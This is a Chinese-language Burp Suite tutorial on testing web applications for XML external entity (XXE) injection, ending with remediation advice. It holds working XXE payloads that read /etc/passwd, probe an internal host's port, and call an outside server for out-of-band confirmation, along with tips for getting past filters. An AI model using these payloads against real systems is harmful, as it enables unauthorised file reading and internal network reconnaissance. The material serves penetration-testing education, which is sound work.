XXE漏洞全称为XML外部实体注入漏洞,当Web应用解析用户传入的XML数据时未对外部实体做严格限制,攻击者就可以构造包含恶意外部实体的XML数据,实现读取本地文件、发起内网请求等攻击目的。Burp Suite作为功能强大的Web渗透测试工具,其代理拦截和重放功能可以方便地修改XML请求内容,是测试XXE漏洞的常用工具。

XXE漏洞基础原理
XML规范允许在文档中定义外部实体,通过<!ENTITY>声明可以引入外部资源,当应用解析包含恶意外部实体的XML数据时,就会触发漏洞。常见的XXE漏洞利用场景包括读取服务器本地文件、探测内网端口、执行SSRF攻击等。
测试前准备
首先需要完成以下准备工作:
- 安装Burp Suite并配置浏览器代理,确保HTTP/HTTPS请求能够被Burp Suite拦截
- 准备存在XXE漏洞的测试环境,比如本地搭建的包含XML解析功能的Web应用
- 了解目标接口的请求格式,确认接口是否接收XML格式的参数
使用Burp Suite测试XXE漏洞的完整流程
1. 拦截目标请求
打开Burp Suite的Proxy模块,开启拦截功能,在浏览器中访问目标Web应用的对应功能页面,提交正常请求,此时Burp Suite会拦截到对应的HTTP请求包。如果是POST请求且Content-Type为application/xml,说明该接口可能接收XML数据,存在XXE漏洞的测试条件。
2. 发送到重放模块修改Payload
将拦截到的请求右键发送到Repeater模块,方便后续反复修改请求内容测试。首先查看原始请求中的XML内容,比如正常的XML请求可能如下:
<?xml version="1.0" encoding="UTF-8"?>
<user>
<name>test</name>
<age>20</age>
</user>
3. 构造XXE测试Payload
根据测试目标构造不同的Payload,常见的测试Payload分为以下几类:
读取本地文件Payload
如果目标是读取服务器上的文件,可以构造如下Payload,以读取Linux系统的/etc/passwd文件为例:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<user>
<name>&xxe;</name>
<age>20</age>
</user>
其中<!ENTITY xxe SYSTEM "file:///etc/passwd">定义了名为xxe的外部实体,指向要读取的文件路径,&xxe;会在XML解析时被替换为实体对应的内容。
探测内网端口Payload
如果要探测目标服务器内网的其他端口是否开放,可以构造如下Payload,探测内网192.168.0.1的80端口:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://192.168.0.1:80">
]>
<user>
<name>&xxe;</name>
<age>20</age>
</user>
如果端口开放,请求会返回正常响应,如果端口关闭,通常会返回连接失败的错误。
4. 发送请求验证结果
在Repeater模块中修改完Payload后,点击发送按钮,查看响应内容。如果响应中出现了/etc/passwd的文件内容,说明存在XXE漏洞可以读取本地文件;如果响应中出现了内网请求的返回结果,说明存在XXE导致的SSRF漏洞。
不同场景的测试注意事项
在实际测试中会遇到不同的XML解析场景,需要注意以下情况:
- 如果XML声明中指定了UTF-16编码,需要将Payload转换为UTF-16格式再发送,否则解析会失败
- 部分应用会对XML中的特殊字符做过滤,可以尝试使用CDATA包裹实体引用绕过过滤
- 如果无回显XXE场景,需要构造带外数据通道,通过请求外部服务器的方式验证漏洞存在,比如构造如下Payload:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "http://ipipp.com/xxe_test">
]>
<user>
<name>&xxe;</name>
<age>20</age>
</user>
如果外部服务器收到了来自目标服务器的请求,说明存在无回显XXE漏洞。
漏洞修复建议
针对XXE漏洞,常见的修复方式包括:禁用XML解析器的外部实体解析功能,使用JSON等更安全的格式传输数据,对用户输入的XML内容做严格的实体过滤,避免恶意实体被解析。
Burp_SuiteXXE漏洞XML注入Web安全测试修改时间:2026-07-11 13:39:38